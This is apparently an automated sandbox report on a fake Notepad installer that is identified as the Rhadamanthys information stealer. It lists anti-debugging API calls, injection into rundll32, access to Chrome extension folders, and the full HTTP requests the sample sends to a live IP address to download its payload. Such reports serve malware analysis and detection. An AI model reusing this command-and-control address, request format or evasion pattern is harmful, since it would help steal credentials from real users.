              Source: Binary string: ws2_32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253309097.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253224746.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_00409BB0 FindFirstFileA,GetLastError,_errno,_errno,_errno,_errno,_errno,_errno,0_2_00409BB0
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C1828C FindFirstFileW,FindNextFileW,1_2_00007DF4B3C1828C
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C1782C FindFirstFileW,FindNextFileW,FindClose,1_2_00007DF4B3C1782C
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior

              Networking

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 164.90.172.224 80Jump to behavior
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2043202 ET TROJAN Rhadamanthys Stealer - Payload Download Request 192.168.2.3:49698 -> 164.90.172.224:80
              Source: TrafficSnort IDS: 2853001 ETPRO TROJAN Rhadamanthys Stealer - Payload Response 164.90.172.224:80 -> 192.168.2.3:49698
              Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-Agentcurl/5.9Sec-Websocket-KeySec-Webs
              Source: rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http:///etc/puk.keyMachineGuidSOFTWARE
              Source: rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com
              Source: rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com
              Source: rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
              Source: rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000002.320753776.0000025AA39CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
              Source: rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=update_error
              Source: rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=update_errorFix
              Source: rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/installer/?product=
              Source: rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
              Source: rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
              Source: rundll32.exe, 00000001.00000003.300183680.0000025AA39D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
              Source: rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
              Source: rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006F0927 memset,memset,WSARecv,GetLastError,WSAGetLastError,WSAGetLastError,WSAGetLastError,RegisterWaitForSingleObject,GetLastError,GetLastError,GetLastError,GetLastError,0_2_006F0927
              Source: global trafficHTTP traffic detected: GET /blob/oo6nbv.a50a HTTP/1.1Host: 164.90.172.224User-Agent: curl/5.9Connection: closeX-CSRF-TOKEN: B8U+rHB9TVwXZpzczPGWeTEwduSJwDKoj9JZsKEJuBxyQjZw6jI0zuO5kLJUBJyXQCnlMeG+5ceQHdme90g2Dw==Cookie: CSRF-TOKEN=B8U+rHB9TVwXZpzczPGWeTEwduSJwDKoj9JZsKEJuBxyQjZw6jI0zuO5kLJUBJyXQCnlMeG+5ceQHdme90g2Dw==; LANG=en-US
              Source: global trafficHTTP traffic detected: GET /blob/oo6nbv.a50a HTTP/1.1Host: 164.90.172.224User-Agent: curl/5.9Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: JK0eGt0EctZUUaP
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DirectInput8Create
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000710000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: NtUserGetRawInputData
              Source: Yara matchFile source: 0.3.Notteppad_SettupX32iX64.exe.2a20000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Notteppad_SettupX32iX64.exe PID: 5280, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5152, type: MEMORYSTR
              Source: Notteppad_SettupX32iX64.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5152 -s 272
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_004076F00_2_004076F0
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_004024460_2_00402446
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_004041200_2_00404120
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_004041D00_2_004041D0
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_004042070_2_00404207
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_004042180_2_00404218
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_00402E300_2_00402E30
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EA0E70_2_006EA0E7
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EE4FC0_2_006EE4FC
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E20C60_2_006E20C6
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006ECA740_2_006ECA74
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007FFC288E16201_2_00007FFC288E1620
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007FFC288E5D391_2_00007FFC288E5D39
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007FFC288E48F01_2_00007FFC288E48F0
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007FFC288EDCE01_2_00007FFC288EDCE0
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007FFC288EFA601_2_00007FFC288EFA60
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007FFC288EB1F01_2_00007FFC288EB1F0
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007FFC288ED8101_2_00007FFC288ED810
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007FFC288F04301_2_00007FFC288F0430
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_0000025AA36022B31_2_0000025AA36022B3
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_0000025AA36059941_2_0000025AA3605994
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_0000025AA360455C1_2_0000025AA360455C
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_0000025AA36019681_2_0000025AA3601968
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_0000025AA36025581_2_0000025AA3602558
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_0000025AA36029F81_2_0000025AA36029F8
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_0000025AA36050941_2_0000025AA3605094
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_0000025AA36054141_2_0000025AA3605414
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C187181_2_00007DF4B3C18718
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C136A01_2_00007DF4B3C136A0
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C115E41_2_00007DF4B3C115E4
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C412241_2_00007DF4B3C41224
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C4B0C81_2_00007DF4B3C4B0C8
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C780901_2_00007DF4B3C78090
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C6673C1_2_00007DF4B3C6673C
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C537541_2_00007DF4B3C53754
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C836E81_2_00007DF4B3C836E8
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C8A6981_2_00007DF4B3C8A698
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C0D6081_2_00007DF4B3C0D608
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C475A81_2_00007DF4B3C475A8
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C4D5581_2_00007DF4B3C4D558
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C015301_2_00007DF4B3C01530
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C984C41_2_00007DF4B3C984C4
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C4A3F41_2_00007DF4B3C4A3F4
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C003D81_2_00007DF4B3C003D8
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3CA5B3C1_2_00007DF4B3CA5B3C
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C49B341_2_00007DF4B3C49B34
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C8EB341_2_00007DF4B3C8EB34
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C86AA01_2_00007DF4B3C86AA0
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C4C9FC1_2_00007DF4B3C4C9FC
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C64A181_2_00007DF4B3C64A18
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C199F01_2_00007DF4B3C199F0
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3CA99641_2_00007DF4B3CA9964
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C419001_2_00007DF4B3C41900
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C6F8641_2_00007DF4B3C6F864
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C198281_2_00007DF4B3C19828
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C4B77C1_2_00007DF4B3C4B77C
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C7AE881_2_00007DF4B3C7AE88
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C40E981_2_00007DF4B3C40E98
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C0FE381_2_00007DF4B3C0FE38
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C26E601_2_00007DF4B3C26E60
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C60DF01_2_00007DF4B3C60DF0
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3CC2DE41_2_00007DF4B3CC2DE4
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C99D581_2_00007DF4B3C99D58
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C5BC881_2_00007DF4B3C5BC88
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C41C4C1_2_00007DF4B3C41C4C
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C40C581_2_00007DF4B3C40C58
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C03C681_2_00007DF4B3C03C68
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: String function: 006EC944 appears 50 times
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_004029FB GetModuleHandleW,strlen,GetProcessHeap,HeapFree,NtProtectVirtualMemory,0_2_004029FB
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E5F12 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_006E5F12
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E93CE lstrlenW,NtOpenDirectoryObject,calloc,calloc,NtQueryDirectoryObject,calloc,memcpy,??3@YAXPAX@Z,0_2_006E93CE
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E4016 NtQueryInformationProcess,0_2_006E4016
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9963 GetCurrentProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,0_2_006E9963
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E6977 GetCurrentProcess,NtQueryInformationProcess,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,VariantInit,VariantInit,VariantInit,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,0_2_006E6977
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9932 GetCurrentProcess,NtQueryInformationProcess,0_2_006E9932
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E99F7 _alloca_probe,NtCreateDebugObject,CloseHandle,0_2_006E99F7
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E99C6 GetCurrentProcess,NtQueryInformationProcess,0_2_006E99C6
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9601 NtClose,0_2_006E9601
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9AB8 GetCurrentThread,GetCurrentThread,NtSetInformationThread,NtSetInformationThread,GetCurrentThread,NtSetInformationThread,GetCurrentThread,NtQueryInformationThread,GetCurrentThread,NtQueryInformationThread,GetCurrentThread,NtQueryInformationThread,0_2_006E9AB8
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9A8B NtQuerySystemInformation,0_2_006E9A8B
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E3F5F NtQuerySystemInformation,NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,GetCurrentProcess,lstrcmpiW,OpenProcess,GetCurrentProcess,CloseHandle,??3@YAXPAX@Z,0_2_006E3F5F
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C22FA4 NtUnmapViewOfSection,VirtualAlloc,NtSetInformationFile,NtClose,1_2_00007DF4B3C22FA4
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C22834 NtQuerySystemInformation,1_2_00007DF4B3C22834
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C22E88 NtOpenFile,1_2_00007DF4B3C22E88
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250519069.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMBASE.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002BD2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000724000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWin32u.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindows.Storage.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244109715.000000000261D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004F60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHELL32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246455497.000000000297A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253137591.000000000262A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLEAUT32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NSC_NameNSC_AddressNSC_PhoneNSC_EmailNSC_DescriptionWM/WriterWM/ConductorWM/ProducerWM/DirectorWM/ContentGroupDescriptionWM/SubTitleWM/PartOfSetWM/ProtectionTypeWM/VideoHeightWM/VideoWidthWM/VideoFrameRateWM/MediaClassPrimaryIDWM/MediaClassSecondaryIDWM/PeriodWM/CategoryWM/PictureWM/Lyrics_SynchronisedWM/OriginalLyricistWM/OriginalArtistWM/OriginalAlbumTitleWM/OriginalReleaseYearWM/OriginalFilenameWM/PublisherWM/EncodedByWM/EncodingSettingsWM/EncodingTimeWM/AuthorURLWM/UserWebURLWM/AudioFileURLWM/AudioSourceURLWM/LanguageWM/ParentalRatingWM/BeatsPerMinuteWM/InitialKeyWM/MoodWM/TextWM/DVDIDWM/WMContentIDWM/WMCollectionIDWM/WMCollectionGroupIDWM/UniqueFileIdentifierWM/ModifiedByWM/RadioStationNameWM/RadioStationOwnerWM/PlaylistDelayWM/CodecWM/DRMWM/ISRCWM/ProviderWM/ProviderRatingWM/ProviderStyleWM/ContentDistributorWM/SubscriptionContentIDWM/WMADRCPeakReferenceWM/WMADRCPeakTargetWM/WMADRCAverageReferenceWM/WMADRCAverageTargetWM/StreamTypeInfoWM/PeakBitrateWM/ASFPacketCountWM/ASFSecurityObjectsSizeWM/SharedUserRatingWM/SubTitleDescriptionWM/MediaCreditsWM/ParentalRatingReasonWM/OriginalReleaseTimeWM/MediaStationCallSignWM/MediaStationNameWM/MediaNetworkAffiliationWM/MediaOriginalChannelWM/MediaIsStereoWM/MediaOriginalBroadcastDateTimeWM/VideoClosedCaptioningWM/MediaIsRepeatWM/MediaIsLiveWM/MediaIsTapeWM/MediaIsDelayWM/MediaIsSubtitledWM/MediaIsPremiereWM/MediaIsFinaleWM/MediaIsSAPWM/ProviderCopyrightWM/ISANWM/ADIDWM/WMShadowFileSourceFileTypeWM/WMShadowFileSourceDRMTypeWM/WMCPDistributorWM/WMCPDistributorIDWM/SeasonNumberWM/EpisodeNumberEarlyDataDeliveryJustInTimeDecodeSingleOutputBufferSoftwareScalingDeliverOnReceiveScrambledAudioDedicatedDeliveryThreadEnableDiscreteOutputSpeakerConfigDynamicRangeControlAllowInterlacedOutputVideoSampleDurationsStreamLanguageEnableWMAProSPDIFOutputDeinterlaceModeInterlacedCodingInitialPatternForInverseTelecineJPEGCompressionQualityWatermarkCLSIDWatermarkConfigFixedFrameRate_SOURCEFORMATTAG_ORIGINALWAVEFORMAT_EDL_COMPLEXITYEX_DECODERCOMPLEXITYPROFILEReloadIndexOnSeekStreamNumIndexObjectsFailSeekOnErrorPermitSeeksBeyondEndOfStreamUsePacketAtSeekPointSourceBufferTimeSourceMaxBytesAtOnce_VBRENABLED_VBRQUALITY_RMAX_BMAXVBR PeakBuffer Average_COMPLEXITYEXMAX_COMPLEXITYEXOFFLINE_COMPLEXITYEXLIVE_ISVBRSUPPORTED_PASSESUSEDMusicSpeechClassModeMusicClassModeSpeechClassModeMixedClassModeSpeechFormatCapPeakValueAverageLevelFold6To2Channels3Fold%luTo%luChannels%luDeviceConformanceTemplateEnableFrameInterpolationNeedsPreviousSampleWM/IsCompilation| vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244881244.0000000002660000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250112415.000000000283E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMBASE.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245960559.0000000000718000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecryptbase.dllj% vs Notteppad_SettupX32iX64.exe
